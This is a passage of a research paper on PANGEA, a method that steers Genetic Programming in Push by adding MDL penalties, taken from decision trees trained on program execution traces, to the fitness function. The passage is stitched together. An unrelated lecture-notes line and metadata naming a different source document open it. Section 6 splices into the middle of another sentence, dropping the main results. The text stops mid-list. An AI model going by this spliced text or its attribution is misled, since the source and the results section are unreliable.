types are convenient and add to the readability and reliability of programs • Arrays and records are included in most languages • Pointers are used for addressing flexibility and to control dynamic storage management
{"Source-Url": "https://www.cs.montana.edu/courses/csci305/notes/chapter6.pdf", "len_cl100k_base": 7457, "olmocr-version": "0.1.50", "pdf-total-pages": 92, "total-fallback-pages": 0, "total-input-tokens": 123583, "total-output-tokens": 10746, "length": "2e12", "weborganizer": {"__label__adult": 0.0002963542938232422, "__label__art_design": 0.00023877620697021484, "__label__crime_law": 0.00021517276763916016, "__label__education_jobs": 0.00045228004455566406, "__label__entertainment": 4.357099533081055e-05, "__label__fashion_beauty": 0.00010877847671508788, "__label__finance_business": 0.00010544061660766602, "__label__food_dining": 0.00030159950256347656, "__label__games": 0.0003437995910644531, "__label__hardware": 0.0006384849548339844, "__label__health": 0.00031948089599609375, "__label__history": 0.0001857280731201172, "__label__home_hobbies": 6.628036499023438e-05, "__label__industrial": 0.00027871131896972656, "__label__literature": 0.00021088123321533203, "__label__politics": 0.00019252300262451172, "__label__religion": 0.00040435791015625, "__label__science_tech": 0.00611114501953125, "__label__social_life": 6.908178329467773e-05, "__label__software": 0.00435638427734375, "__label__software_dev": 0.984375, "__label__sports_fitness": 0.0002310276031494141, "__label__transportation": 0.0003452301025390625, "__label__travel": 0.0001577138900756836}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 30132, 0.00886]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 30132, 0.86975]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 30132, 0.85144]], "google_gemma-3-12b-it_contains_pii": [[0, 22, false], [22, 328, null], [328, 685, null], [685, 1000, null], [1000, 1241, null], [1241, 1532, null], [1532, 1806, null], [1806, 2060, null], [2060, 2255, null], [2255, 2593, null], [2593, 2786, null], [2786, 2958, null], [2958, 3462, null], [3462, 3801, null], [3801, 4005, null], [4005, 4276, null], [4276, 4576, null], [4576, 4806, null], [4806, 5259, null], [5259, 5692, null], [5692, 6030, null], [6030, 6291, null], [6291, 6523, null], [6523, 6701, null], [6701, 7085, null], [7085, 7470, null], [7470, 7816, null], [7816, 8154, null], [8154, 8618, null], [8618, 8863, null], [8863, 9236, null], [9236, 9687, null], [9687, 9843, null], [9843, 10194, null], [10194, 10804, null], [10804, 11258, null], [11258, 11417, null], [11417, 11797, null], [11797, 12073, null], [12073, 12296, null], [12296, 12540, null], [12540, 13073, null], [13073, 13449, null], [13449, 13793, null], [13793, 14049, null], [14049, 14304, null], [14304, 14567, null], [14567, 15056, null], [15056, 15346, null], [15346, 15703, null], [15703, 16041, null], [16041, 16441, null], [16441, 16842, null], [16842, 17228, null], [17228, 17754, null], [17754, 18146, null], [18146, 18575, null], [18575, 19150, null], [19150, 19487, null], [19487, 19715, null], [19715, 20026, null], [20026, 20403, null], [20403, 20478, null], [20478, 20655, null], [20655, 20877, null], [20877, 21224, null], [21224, 21590, null], [21590, 21989, null], [21989, 22068, null], [22068, 22575, null], [22575, 22829, null], [22829, 23243, null], [23243, 23409, null], [23409, 23822, null], [23822, 24126, null], [24126, 24238, null], [24238, 24783, null], [24783, 25079, null], [25079, 25434, null], [25434, 26054, null], [26054, 26117, null], [26117, 26476, null], [26476, 27006, null], [27006, 27363, null], [27363, 27576, null], [27576, 27826, null], [27826, 28213, null], [28213, 28401, null], [28401, 28933, null], [28933, 29274, null], [29274, 29657, null], [29657, 30132, null]], "google_gemma-3-12b-it_is_public_document": [[0, 22, true], [22, 328, null], [328, 685, null], [685, 1000, null], [1000, 1241, null], [1241, 1532, null], [1532, 1806, null], [1806, 2060, null], [2060, 2255, null], [2255, 2593, null], [2593, 2786, null], [2786, 2958, null], [2958, 3462, null], [3462, 3801, null], [3801, 4005, null], [4005, 4276, null], [4276, 4576, null], [4576, 4806, null], [4806, 5259, null], [5259, 5692, null], [5692, 6030, null], [6030, 6291, null], [6291, 6523, null], [6523, 6701, null], [6701, 7085, null], [7085, 7470, null], [7470, 7816, null], [7816, 8154, null], [8154, 8618, null], [8618, 8863, null], [8863, 9236, null], [9236, 9687, null], [9687, 9843, null], [9843, 10194, null], [10194, 10804, null], [10804, 11258, null], [11258, 11417, null], [11417, 11797, null], [11797, 12073, null], [12073, 12296, null], [12296, 12540, null], [12540, 13073, null], [13073, 13449, null], [13449, 13793, null], [13793, 14049, null], [14049, 14304, null], [14304, 14567, null], [14567, 15056, null], [15056, 15346, null], [15346, 15703, null], [15703, 16041, null], [16041, 16441, null], [16441, 16842, null], [16842, 17228, null], [17228, 17754, null], [17754, 18146, null], [18146, 18575, null], [18575, 19150, null], [19150, 19487, null], [19487, 19715, null], [19715, 20026, null], [20026, 20403, null], [20403, 20478, null], [20478, 20655, null], [20655, 20877, null], [20877, 21224, null], [21224, 21590, null], [21590, 21989, null], [21989, 22068, null], [22068, 22575, null], [22575, 22829, null], [22829, 23243, null], [23243, 23409, null], [23409, 23822, null], [23822, 24126, null], [24126, 24238, null], [24238, 24783, null], [24783, 25079, null], [25079, 25434, null], [25434, 26054, null], [26054, 26117, null], [26117, 26476, null], [26476, 27006, null], [27006, 27363, null], [27363, 27576, null], [27576, 27826, null], [27826, 28213, null], [28213, 28401, null], [28401, 28933, null], [28933, 29274, null], [29274, 29657, null], [29657, 30132, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 30132, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, true], [5000, 30132, null]], "pdf_page_numbers": [[0, 22, 1], [22, 328, 2], [328, 685, 3], [685, 1000, 4], [1000, 1241, 5], [1241, 1532, 6], [1532, 1806, 7], [1806, 2060, 8], [2060, 2255, 9], [2255, 2593, 10], [2593, 2786, 11], [2786, 2958, 12], [2958, 3462, 13], [3462, 3801, 14], [3801, 4005, 15], [4005, 4276, 16], [4276, 4576, 17], [4576, 4806, 18], [4806, 5259, 19], [5259, 5692, 20], [5692, 6030, 21], [6030, 6291, 22], [6291, 6523, 23], [6523, 6701, 24], [6701, 7085, 25], [7085, 7470, 26], [7470, 7816, 27], [7816, 8154, 28], [8154, 8618, 29], [8618, 8863, 30], [8863, 9236, 31], [9236, 9687, 32], [9687, 9843, 33], [9843, 10194, 34], [10194, 10804, 35], [10804, 11258, 36], [11258, 11417, 37], [11417, 11797, 38], [11797, 12073, 39], [12073, 12296, 40], [12296, 12540, 41], [12540, 13073, 42], [13073, 13449, 43], [13449, 13793, 44], [13793, 14049, 45], [14049, 14304, 46], [14304, 14567, 47], [14567, 15056, 48], [15056, 15346, 49], [15346, 15703, 50], [15703, 16041, 51], [16041, 16441, 52], [16441, 16842, 53], [16842, 17228, 54], [17228, 17754, 55], [17754, 18146, 56], [18146, 18575, 57], [18575, 19150, 58], [19150, 19487, 59], [19487, 19715, 60], [19715, 20026, 61], [20026, 20403, 62], [20403, 20478, 63], [20478, 20655, 64], [20655, 20877, 65], [20877, 21224, 66], [21224, 21590, 67], [21590, 21989, 68], [21989, 22068, 69], [22068, 22575, 70], [22575, 22829, 71], [22829, 23243, 72], [23243, 23409, 73], [23409, 23822, 74], [23822, 24126, 75], [24126, 24238, 76], [24238, 24783, 77], [24783, 25079, 78], [25079, 25434, 79], [25434, 26054, 80], [26054, 26117, 81], [26117, 26476, 82], [26476, 27006, 83], [27006, 27363, 84], [27363, 27576, 85], [27576, 27826, 86], [27826, 28213, 87], [28213, 28401, 88], [28401, 28933, 89], [28933, 29274, 90], [29274, 29657, 91], [29657, 30132, 92]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 30132, 0.03448]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
ae3f931fa0edaebbae0d04154a63f31cd672225d
ABSTRACT Online progress in search and optimization is often hindered by neutrality in the fitness landscape, when many genotypes map to the same fitness value. We propose a method for imposing a gradient on the fitness function of a metaheuristic (in this case, Genetic Programming) via a metric (Minimum Description Length) induced from patterns detected in the trajectory of program execution. These patterns are induced via a decision tree classifier. We apply this method to a range of integer and boolean-valued problems, significantly outperforming the standard approach. The method is conceptually straightforward and applicable to virtually any metaheuristic that can be appropriately instrumented. Categories and Subject Descriptors I.2.2 [Artificial Intelligence]: Automatic Programming; I.2.8 [Artificial Intelligence]: Problem Solving, Control Methods, and Search—Heuristic methods General Terms Algorithms, Design, Experimentation Keywords genetic programming, neutrality, program trace, MDL, Push 1. INTRODUCTION AND MOTIVATIONS A Genetic Programming (GP) task is defined by a set of input data (fitness cases) and the desired program output for each of them. A GP algorithm is expected to infer the program only from these training examples. This can be very hard. When the task is challenging, it may be difficult for the search process to `lift off', i.e. to make any progress. For instance, if exhibiting any nontrivial (non-constant) behavior leads to fitness deterioration, then it will locally pay off for a program in a population to return a constant output regardless of the input data. This problem is not as severe in domains in which program performance on each test is assessed quantitatively. An example of such a domain is symbolic regression, where the error committed by a program on each fitness case is a continuous value, and thus can change gradually. Unfortunately, for more typical programing tasks, tests are qualitative: a program either passes a test or not. Synthesizing Boolean functions, sorting programs etc., belong to this category. The key observation that motivates this study is that even programs which yield a completely useless output (meaning: output that does not match in any way the desired output) may produce some intermediate outcomes that can be relevant for solving the task. Take for instance the n-bit parity task. An initial part of program that correctly calculates the number of ones in half of the inputs (bits) provides a potentially useful capability. However, this partial outcome may be lost in the course of subsequent calculations carried out by the program, so that the ultimate output of the program is (for instance) the constant true. As a result, the program receives low fitness, and may not pass the selection process, so that its useful partial capability will be lost. In standard GP, such intermediate results are not taken into account, because there is no singular means for assessing the quality of partial (intermediate) results produced by a program, given only the specification of the entire task. This is similar to a reinforcement learning setting, in which the agents are usually rewarded only after the entire task has been solved (i.e. once the goal state has been reached). For instance, an agent learning to play a game receives rewards only for complete games — there is no direct feedback about the quality of individual moves. We postulate here that evaluation of partial program outcomes may yield better insight and is technically feasible. Since these partial results have ultimately been calculated from input data that came with the task and using an instruction set that also belongs to task formulation, they can represent useful pieces of knowledge of potential value in assembling a complete solution. In particular, the outcomes calculated for multiple inputs (fitness cases) can form some patterns that can be exploited to solve the task. A skilled human programmer or mathematician is capable of discovering such patterns and exploiting them to reach the goal, i.e. to design an algorithm that meets a prescribed specification. Moreover, humans are capable of defining what patterns are desired as an intermediate result. Consider designing an algorithm that calculates the median of a vector of numbers. A reasonable first stage of solving this task is sorting the elements of the input vector. an intermediate memory state (pattern) containing sorted elements of the input vector is desired for this task (and anticipated by a human programmer). Given that the distribution of problems considered in practice (including the problems approached with GP) is highly nonuniform, one might anticipate that some such patterns occur more frequently than others. In theory, it should be then possible to build an algorithm (system) which mimics the human programmer in that respect, i.e. in being capable of detecting the potentially useful patterns and rewarding the programs that produce them at intermediate execution stages. Hereafter, we use the term PANGEA (PAtterN Guided Evolutionary Algorithms) to describe this conceptual framework (as will be seen, there are no specific requirements that this approach be restricted to GP). The specific approach proposed in this paper belongs to this framework and is based on the observation that, as a matter of fact, computational intelligence already provides automated pattern discovery tools that can capture the regularities in data. What we mean by this are the various machine learning and knowledge discovery algorithms. Thus, the key idea of the approach is to use a machine learning algorithm to search for such patterns by training it on the partial outcomes of program execution. Information on the resulting trained classifier (in particular its complexity and accuracy) is then used to augment the fitness function. If this approach is able to reveal meaningful dependencies between partial outcomes and the desired output, we may hope to thereby promote programs with the potential to produce good results in future, even if at the moment of evaluation the output they produce is incorrect. 2. THE BACKGROUND We define a GP task as a set of \( n \) fitness cases (tests). A test is a pair \((x_i, y_i)\), \( i = 1, \ldots, n \), where \( x_i \) is the input to be fed into program, and \( y_i \) is the desired output. In general, \( x, y \) can be arbitrary objects. Evaluation of an individual-program \( p \) assesses the quality of its mapping from inputs to desired outputs by applying it to all tests in turn. For each test, \( p \) is provided with input \( x_i \) and executed, returning output which we denote as \( p(x_i) \). We say that \( p \) solves test \((x_i, y_i)\) if it terminates and \( p(x_i) = y_i \). The fitness of a program is simply the fraction of tests it does not solve, i.e. \[ f(p) = \frac{1}{n} \left[ n - |\{(x_i, y_i) : p(x_i) = y_i\}| \right]. \] Note that for the sake of simplicity, in this study we assume that only perfect matches between the desired output and the actual output are of interest. Therefore, only the equality relation in the space of program outputs needs to be defined (rather than more sophisticated relations like similarity). The fitness defined in this way is obviously minimized fitness, and a program \( p \) solves a task if \( f(p) = 0 \). 3. THE METHOD The method proposed in this paper differs from standard GP only in the manner in which fitness is assigned to individuals. Therefore, given the formalization of the conventional fitness assessment in the previous section, we show here how we diverge from it. This process, illustrated in Fig. 1 can be split into four stages detailed in the following subsections. 3.1 Program trace acquisition Our method works by gathering and exploiting information resulting from the intermediate stages of program execution. For this to be possible, we have to assume that (i) program execution is a stepwise process that can be paused, and that (ii) at such pauses, some information can be obtained from the execution environment. In virtually all genres of GP, these requirements are met by default. Concerning for instance the former, program is a discrete structure composed of symbols interpreted in certain order. These assumptions allow us to formalize certain notions, which we do below, abstracting from any specific form of GP. Formally, let \( s_j(p, x_i) \) denote the state of the execution environment when applying program \( p \) to test \( x_i \) after \( j \) steps have been executed. In side-effect free programming, relatively typical of tree-based GP, this would embrace a partial program (a subtree) and its outcome (the value returned by this subtree). For stateful execution environments, typical of programming languages with side-effects, this would be the state of the interpreter (its memory, instruction pointer, etc.). In other words, state is a 'snapshot' of the concrete process of program execution (i.e. pertaining to specific \( x_i \)). The sequence of states \( (s_j(p, x_i) : j = 1, \ldots, l) \) resulting from entire program run forms its trace, where \( l \) is the number of steps, e.g., the number of instructions executed by a program, whether it terminated on its own or was forced to do so. The last state in a trace is the state of execution environment after program completion. We used a similar definition in our previous work on semantic analysis of program behavior [2]. In the proposed approach, the fitness assessment presented in Section 2 is accompanied by trace registration. As a re- sult, we obtain a list of traces \( (s_j(p,x_i) : j = 1, \ldots, l_i) \) for our \( n \) fitness cases \((x_i, y_i)\). Let us note that, because in general program termination depends on its input, traces can vary in length, hence the index \( i \) in \( l_i \). ### 3.2 Extracting trace features The trace can be considered as a way of capturing program behavior. The key idea of PANGEA consists in analyzing the traces in search for patterns/regularities that reveal hidden qualities in the program and its partial outcomes. Various tools can be potentially used for this purpose, which we elaborate on in Section 7. In this paper, for the sake of simplicity, we aim at employing conventional machine learning algorithms that implement the paradigm of learning from examples and attribute-value representation [8]. To match the requirements of conventional machine learning algorithms with respect to input data, we transform the list of traces into a conventional machine learning dataset, where each row (example) corresponds to GP test, and every column is a feature derived in certain way from the traces. Each feature reflects certain syntactic or semantic information of all program traces at certain stage of program execution. Because the way the features are calculated from the states depends on state internals, this (and only this) stage of our approach varies depending on GP genre. In the subsequent section and experimental part, we detail it for Push [12], but in our pursuit of generality, we abstract from this technical detail in this section. Crucially, we make this dataset define a supervised learning task. To this aim, we equip it with an extra column that defines a decision attribute. The value of this attribute is based on the desired output \( y_i \) of the corresponding test \((x_i, y_i)\). In this paper we focus on GP tasks in which \( y_i \) is a single discrete value, in which case the decision attribute simply is \( y_i \). This attribute will allow us to detect and capture patterns that are relevant for solving the task at hand. ### 3.3 Capturing patterns in features The outcome of the above stage is a dataset of \( n \) examples, each described by the same number of features and labeled with a decision attribute that identifies the desired output. The purpose of the next step is to assess how useful these features are in predicting the desired output of the program. We achieve this by training a standard machine learning classifier, using the entire dataset as the training set. Specifically, we employ C4.5, a popular decision tree induction algorithm [3]. We anticipate that this choice is not critical; any inductive learning method could be applied here, as long as its outcomes can be analyzed with respect to the properties required in the next step. We are interested in two characteristics of the induced classifier. Firstly, it has certain inherent complexity, which in the case of decision trees can be conveniently expressed as the number of tree nodes. Secondly, it commits a certain classification error on the training set, i.e. it erroneously classifies some of the examples. According to the Minimum Description Length principle (MDL [10]), the complexity of the mapping from the space of features onto the decision attribute may be expressed by summing the encoding length of the classifier (the ‘rule’) and the number of erroneously classified examples (the exceptions from the rule). In our context, this quantity tells us how easy it is to come up with the correct output of the program given the partial results gathered from its traces. This is the core element of the approach we propose here. From another perspective, the role of the classifier is to complement the program’s capability of solving the problem (i.e. producing the desired output value). If the features collected from the program trace form meaningful patterns, i.e. capture regularities in input data that are relevant to program output (decision class), then the induction algorithm should be able to build a compact tree that commits few classification errors (and thus has short description length). To illustrate this, let us consider an extreme case of an ideal program \( p \) that solves the task, i.e. produces the desired output \( y_i \) for all tests \((y_i \equiv p(x_i))\). Since the final (post-execution) state is the last element of each trace, and the features are collected from trace elements, then one or more of the features in the training set will highly correlate with it. Assume for simplicity that the feature is perfectly correlated with \( y_i \). In such a case, the induction algorithm will produce a decision tree composed of a single decision node (using that particular feature), and \( d \) leaves that correspond to the \( d \) decision classes. This is the smallest decision tree that can be built for such problem. This tree commits no classification errors, so the total length of the classifier encoding and the ‘exceptions’ will be minimal. In this scenario, the classifier does not augment the capabilities of the program. If the program does not produce the desired output, the tree induction algorithm will be forced to make use of other features collected from the traces. The resulting tree will usually be larger than the minimal tree and/or commit some classification errors. In general, the less useful the features collected from the trace, the longer will be the total description length of the mapping. This shows that the total length of encoding expresses the usefulness of the intermediate results produced by the program (not only explicit results, reflecting, e.g. memory states, but also side-effects such as total number of execution steps). Most importantly, this length provides a meaningful way of assessing a program’s ‘prospective’ capabilities, even if the actual output of the program is completely useless from the point of view of the task being solved (i.e. has nothing in common with the desired output). ### 3.4 Fitness calculation Based on the above rationale, we define program fitness as follows. Let \( l(p) \) denote the total number of tree nodes, and \( c(p) \) the number of examples that are erroneously classified by the tree induced from the traces of individual-program \( p, c(p) \in [0, n] \). In PANGEA, the fitness of \( p \) is the product of the standard fitness \( f(p) (0 \leq f(p) \leq 1 \), Formula 11 and two terms that penalize the individual for, respectively, the complexity of mapping implemented by the induced classifier, and for the number of classification errors (exceptions from that mapping): \[ f_p(p) = f(p) \times \log_2(l(p) + 1) \times \frac{c(p) + 1}{n + 1} \] (2) The particular form of this equation results from preliminary experiments. The logarithm of the tree size is used so that model complexity is proportional to tree depth rather than to tree size. The +1 term in the second component (responsible for model complexity) prevents it from sinking to zero (the tree always has at least one node). The +1 term in the nominator of the third component (encoding length of exceptions) plays an analogous role. Therefore, the MDL-related components of fitness have an impact on program’s fitness, but will never render it perfect. This can be achieved only by bringing the actual error committed by \( p \) on the tests, i.e., \( f(p) \), to zero. Thus, a solution is optimal in PANGEA if and only if it is optimal w.r.t. the standard fitness definition (Formula 1). 4. RELATED WORK There are numerous occasions in which the MDL principle has been used in GP. In most such cases, it has played a similar role to other machine learning techniques, i.e. as a means of controlling the trade-off between model complexity (sometimes referred to as \textit{parsimony} in a ML context) and accuracy. In this spirit, Iba \textit{et al.} used it to prevent bloat in GP by designing an MDL-based fitness function that took into account the error committed by an individual as well as the size of the program. A few later studies followed this research direction (see, e.g. [14]). By focusing mostly on the effects of program execution (the partial outcomes reflected in trace features) rather than on syntax, PANGEA can be seen as following the recent trend of semantic GP, initiated in [7]. Interestingly, it also resembles evolutionary synthesis of features for machine learning and pattern/image analysis tasks [6]. However, here the ML part serves only as a scaffolding for evolution: it is supposed to provide ‘gradient’ for evolution when the sole program output is not able to do so. The classifier is not the part of a solution. 5. IMPLEMENTING PANGEA WITH PUSH In this section we explain how the process of feature extraction can be implemented for the programming language Push \[12\], which is also used in the experimental part of this paper. However, this choice is rather incidental, since program traces and their features can be easily acquired for other programming environments common in GP. 5.1 The fundamentals of Push Push is a stack-based language, and its interpreter is equipped with a stack that holds the program to be executed, and a separate stack for each data type. For simplicity, we assume here that computation takes place in the Boolean and integer domains only, so only these three stacks (called EXEC, BOOLEAN and INTEGER in the following) will be of interest to us. Push programs are lists of instructions that can be nested. To run a program, it is pushed onto the EXEC stack. Instructions are then popped from this stack and executed in turn. Every Push instruction manipulates one or more stacks. For instance, \texttt{integer.=} instruction pops two elements from the integer stack and pushes the result of their comparison atop the boolean stack. An instruction has no effect if the stack is too shallow. For details on this and other features of this programming framework, see [12]. When matching the notation introduced in Section 2 against Push, a task is a list of tests \((x_i, y_i)\), where \(x_i\) determines the state of the execution environment (the stacks) before program execution, and \(y_i\) determines the analogous desired state after program completion. For inputs, ‘determines’ means in practice placing the elements of \(x_i\) onto the stacks of appropriate types. For outputs, \(y_i\), usually a scalar value, specifies the desired value on the top of the stack of appropriate type. For simplicity, we consider here only tasks with desired outputs \(y_i\) specified as scalars (atoms) of either integer or boolean type (depending on task type). We also assume that \(x_i\) is an arbitrary-length vector of integers that determines the initial state the INTEGER stack, and the output is the contents it leaves on the top the stack (INTEGER or BOOLEAN, depending on the type of desired output) after completion. We assume that a test has not been solved if the output stack is empty. By way of example consider the task of verifying whether the input is a list of integers sorted ascendingly. In such task, each \(x_i\) would be a list of integers that would be placed on the INTEGER stack prior to program execution, while each \(y_i\) would be a Boolean value to be expected on the BOOLEAN stack. 5.2 Trace acquisition and feature extraction in Push For Push, we implement the trace acquisition and feature extraction process introduced in general in Sections 3.2 and 3.1 as follows. We track program execution by pausing it after each instruction and storing the state of the interpreter. We do so until the program terminates or reaches a prescribed maximum number of steps. A state comprises all stacks that are relevant for the tasks considered in this paper, i.e., BOOLEAN, INTEGER, and EXEC. The list of states collected in this way for a specific test \((x_i, y_i)\) forms the trace. Let us reiterate that, depending on input \(x_i\), the number of executed instructions may vary, and hence the length of the resulting trace (see Fig. 1). After tracing execution of the program on all \(n\) tests, we build a machine learning dataset by extracting features from selected elements of the history of program execution gathered in traces. Each trace gives rise to one example in the set. Starting from the last state of the trace, we iterate backwards over \(k\) last states, and from each of these states \(s_j\) we extract the following features: - The sizes of all three stacks under consideration. - The top elements of these stacks (if a stack is empty, we assume default values: zero for INTEGER stack, and a special value \texttt{Null} for the BOOLEAN and EXEC stacks). In this process, we maintain the types of data: the integer-valued components of interpreter state (the sizes of all stacks and the top element of the INTEGER stack) translate into ordinal features, and the remaining components (the top elements of BOOLEAN and EXEC stacks) give rise to nominal (categorical) features. Let us illustrate this process with a simple example, in which we focus exclusively on the INTEGER stack (feature extraction for the other stacks proceeds analogously). Assume we have three fitness cases and \(k = 2\). A program was applied to these cases, and the top elements on the INTEGER in the corresponding traces were as follows: - For test #1: 1 2 3 4 - For test #2: 5 6 7 - For test #3: 8 9 952 The lengths of traces range from four to two, which tells us that the program terminated after executing different number of instructions for each fitness case. This is quite common for Push programs and may result from, e.g., the presence of loops. Because \( k = 2 \), two features (apart from the features reflecting the sizes of stacks) will be extracted from these traces: \( a_1 = [3, 7, 0] \) and \( a_2 = [4, 0, 0] \), where the zeroes are the default values. In general, three stacks (each giving rise to two features, the top element and the size), and two methods of feature building total to \( 12 \times k \) features for horizon of length \( k \). This set is supplemented with another feature: the number of execution steps \( t_i \) carried out by the interpreter for the \( i \)th test. Thus, the complete dataset forms a table of \( n \) rows (examples) and \( 12k + 1 \) columns (features), \( 8k \) of which are ordinal and \( 4k+1 \) nominal. Finally, we provide each example with a class label, which is simply the actual output of the program, i.e., \( z_i \). Therefore, the number of distinct output values in the set of fitness cases is also the number of decision classes in the extracted dataset. The dataset constructed in this way forms the result of feature extraction process, and is subject to further processing presented in Sections 5.3 and 5.4 6. EXPERIMENT The main objective of the experiment is to determine if pattern-based evaluation of individuals can be beneficial for evolutionary search. To this end, we compare the PANGEA approach to the control method of standard PushGP. More specifically, we compare GP running two fitness definitions, given by Formula 1 and Formula 2. In all the test problems we consider, listed in Table 1, the input data is a table (one or more elements placed on the integer stack prior to program execution), and the desired output is a scalar value. In most problems (AEQ, CNF, ISO, MAJ), the task is to verify certain properties of the input (the output type is boolean). Two problems (COZ, MAX) are of a more arithmetic nature (the output type is integer). The choice of this particular suite of tasks deserves justification. The tool we use for capturing patterns in traces and the only difference between the standard Push (STD) and the proposed approach (PANGEA) is the manner in which individuals are evaluated. Fitness is minimized in both cases. In STD, it is Formula 1 and in PANGEA it is calculated according to Formula 2. PANGEA gathers fea- features from the last three states of the interpreter (as a matter of fact, it is often the case that many of those exceptions are AEQ3 and AEQ4, which apparently can be solved even once by either of the compared methods. Nevertheless, PANGEA outperforms STD on the remaining big problems. ### 6.2 The role of fitness components The interplay of the components of the fitness function defined by Formula (2) can be expected to be very complex, so it is worth investigating the extent to which they all contribute to the performance of PANGEA. In other words: could it be that PANGEA fares better only because the MDL-related components introduce pseudo-random noise into the evaluation criterion and so help the evolution to escape stagnation? To verify this, we ran a series of experiments with fitness based on Formula (2), but devoid of single components: - PANGEA-E: formula (2) devoid of the program error (first) component, - PANGEA-M: formula (2) devoid of the model length (second) component, - PANGEA-X: formula (2) devoid of the classification error (third) component. The performance of these methods is shown in the lower part of Table 3. As it turns out, all three components of Formula (2) are vital. Removal of any of them typically results in a lower success ratio than PANGEA. The only exceptions are AEQ3 and AEQ4, which apparently can be solved with near certainty even with such ‘crippled’ fitness functions. This result shows that for the fitness assessment scheme followed by PANGEA, it is important to take into account not only the complexity of the model (tree), but also the classification errors it commits. To provide an overall perspective on these results, in the last column of Table 3 we report the average rank for each of the five setups. PANGEA clearly ranks as best. We validate the statistical significance of ranks using the Friedman test, the outcome of which is positive ($p \approx 0.0005$), i.e. at least one of the has success ratio significantly different from the others. Shaffer’s post-hoc analysis procedure allows us to determine that PANGEA is significantly better ($p < 0.05$) than STD and PANGEA-M. 6.3 Dynamics of the search process To illustrate the working principle of PANGEA, in this section we shortly analyze an exemplary evolutionary run for MAJ3 problem. That particular run lasted for 20 generations, in which an ideal solution has been found. The chart in Fig. 2 summarizes the dynamics of that search process by plotting the important parameters of the best-of-generation individuals. For each such individual $p$, we show in parallel the essential components of PANGEA fitness (Formula 2): program fitness $f(p)$, the actual error $e(p)$ committed by the program on the fitness cases, the size $l(p)$ (the number of nodes) of the associated decision tree induced from trace features, and the classification error $e(p)$ committed by the tree. Because of different magnitudes, the former two are plotted against the left-hand ordinate axis, and the latter against the right-hand ordinate axis. In the first five generations of the run evolution does not seem to make progress and all the parameters of the best-of-generation solutions remain unchanged. In this period, the decision trees comprise only three nodes and commit 8.4 classification errors (in general, the classification error of C4.5 is defined on a continuous scale), i.e., roughly eight of 12 fitness cases that constitute the MAJ3 task get misclassified. Let us emphasize that the fixing of this parameters may be purely incidental, i.e. it does not imply that the trees corresponding to these five best-of-generation individuals use the same features. The very small tree size in connection with relatively large number of classification errors suggests that the traces are scant in useful features, and that decision trees that accurately and succinctly map them onto the desired output cannot be built. In generation 6 evolution manages to make progress and the best-of-generation fitness $f(p)$ substantially improves. The reason for this is however not a better match of program output with the desired output; just the opposite, $f(p)$ actually deteriorates. The cause for fitness improvement lies elsewhere: what actually happened is that the classification error committed by the tree $e(p)$ dropped from 8.4 to 3.5, while the size of the tree $l(p)$ increased from 3 to 5. Apparently, at some stage of execution of the best-of-generation program, a new pattern emerged in its traces (new w.r.t. to the best programs from previous generations). That feature (one or more) allowed building a more accurate decision tree that has only two more nodes. As a result, the product of the two MDL-related terms in Formula 2 decreased, and brought down the overall fitness $f(p)$ despite actual deterioration of the final output produced by the program as measured by the standard fitness $f(p)$ (Formula 1). In the subsequent 7th generation the induction algorithm manages to build an even smaller tree, bringing its size back to three nodes, while maintaining the same classification error $e(p) = 3.5$. This results in further improvement of overall fitness, even given that $f(p)$ remains unchanged. Generation 8 is the first time when program trace allows building a perfect decision tree ($e(p) = 0$). This is also the generation in which the mismatch between the program’s output and the desired output ($e(p)$) is maximal in this run. This however does not prevent this program to outperform the best-of-run of the previous generation in terms of fitness $f(p)$. The tree found in generation 8 is large: it comprises 21 nodes. Nevertheless, the very next generation sees a large decrease of this value: the tree has five nodes again, and classifies all examples perfectly. With minor fluctuations, this state is maintained in the remaining part of the run, while the evolution clearly works on the output of the program, gradually bringing $f(p)$ to zero. This illustration confirms our rationale behind PANGEA’s design, which we expressed in Section 3.3: the MDL-related components in fitness definition protect the individuals that discover meaningful patterns in the task and display those patterns in their behavior (written down in program traces). Without this mechanism, the individual like the that became best-of-generation 6 would most likely get lost in the selection process, as its error $e(p)$ is noticeably worse than the error of the best individual from the previous generation. PANGEA enables even more insightful analysis, which we are forced to omit in this short contribution. For instance, it would be fascinating to see what are the features that led to the major transitions observable in runs like the one here, and also the code that generated it. Such investigations could help us for instance to determine whether, in the example above, evolution, after discovering the meaningful patterns around generations 5 to 8, kept the initial parts of programs roughly unchanged (to preserve the patterns), while working mostly on the final instructions (responsible for producing the final program output). 7. DISCUSSION Our approach relies on a three-stage process: the recognition of patterns, the explicit description of such patterns in ‘working memory’, and the exploitation of these patterns to guide the search process. In the approach described here, the patterns are written down as decision trees, which in turn augment the fitness function. Of course, such classifiers might be incapable of capturing the specific form of patterns that are relevant for solving a particular task. We have adopted the intentionally evocative term ‘pattern’ rather than feature in order to emphasize the potential for algorithmic sophistication and nontrivial computational effort in detecting and exploiting any aspects of the search process. We might therefore hope to mine for such patterns in problem description, genotype-to-phenotype mapping, solution-state trajectory, algorithm-state trajectory, or operator-sequence trajectory. It is clearly possible to combine these modalities, e.g. as in the current article which works with the combined trajectories of algorithm state, solution state and operator sequence. We give here some possible ‘use cases’ for pattern detection that illustrate the potential for future work within this abstract framework: 1. One of the well-known properties of GP is that it is a ‘model-agnostic’ approach - assuming that we apply the function set \{+,-,*,/\exp, \log, \sin, 